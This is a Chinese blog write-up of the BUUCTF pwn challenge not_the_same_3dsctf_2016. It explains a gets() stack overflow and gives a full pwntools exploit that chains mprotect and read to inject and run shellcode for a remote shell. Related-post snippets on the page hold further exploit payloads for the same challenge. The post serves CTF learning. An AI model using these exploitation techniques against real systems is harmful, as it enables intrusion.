BUUCTF-PWN-not_the_same_3dsctf_2016

最新推荐文章于 2023-12-03 16:46:29 发布
最新推荐文章于 2023-12-03 16:46:29 发布
阅读量212 收藏
点赞数 1
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Henlenl/article/details/117017515
版权
CTF 同时被 2 个专栏收录
28 篇文章 2 订阅
订阅专栏
pwn
7 篇文章 0 订阅
订阅专栏

文章目录

查看文件信息

开了个NX保护
在这里插入图片描述

IDA静态分析

开始看上去 其实就是利用gets()来溢出的
在这里插入图片描述

我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串

在这里插入图片描述
我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读不到flag的,而f14g在bss段 根本没有ret指令可以利用
在这里插入图片描述

但是 这里面有mprotect函数 可以用它来修改我们内存栈的权限,让它可读可写可执行,接着让写入shellcode,然后执行获取shell
在这里插入图片描述
这里我们需要借助三个参数的三个寄存器指令

ROPgadget --binary pwn --only “pop|ret” | grep pop

在这里插入图片描述
将.got.plt改为可读可执行
在这里插入图片描述
将返回地址填写成read函数,传入read函数的参数,然后将返回地址改为我们修改为可读可写可执行的地址,最好去写入shellcode 函数

exp

from pwn import *


elf = ELF('pwn')
#r = process('pwn')
r = remote('node3.buuoj.cn',27357)

mprotect_addr = 0x0806ed40
addr = 0x080eb000
ret_addr = 0x0806fcc8
read_addr = elf.symbols['read']

shellcode = asm(shellcraft.sh())

payload = 'a' * 0x2d+p32(mprotect_addr)+p32(ret_addr)
payload += p32(addr)+p32(0x100)+p32(0x7)
payload+= p32(read_addr)+p32(ret_addr)
payload+=p32(0)+p32(addr)+p32(len(shellcode))+p32(addr)

r.sendline(payload)
r.sendline(shellcode)

r.interactive()
Persistent_s
关注
专栏目录
BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1580
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 213
题目截图
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 896
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 429
BUUCTF - PWN】not_the_same_3dsctf_2016题解
BUUCTF(pwn)not_the_same_3dsctf_2016
半岛铁盒的博客
03-28 259
from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e270 payload='a'*0x2d+p32(get_secret)+p32(write)+p32(0)+p32(1)+p32(flag)+p32(45) p.senline(payload) p.interactive() 有疑问的欢迎留言❄
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 2073
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 513
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 365
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1532
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 226
本题目本地与远程得用两种方案打。
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1687
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1485
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 573
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
[BUUCTF]-PWN:not_the_same_3dsctf_2016解析
最新发布
2301_79326813的博客
12-03 472
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3874
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
not_the_same_3dsctf_2016
z1r0的博客
12-04 122
not_the_same_3dsctf_2016 查看保护 这里有一个溢出,还有一个后门,只不过不能输出,所以劫持write这个函数来进行输出 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25451) else: r = process(file_n
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值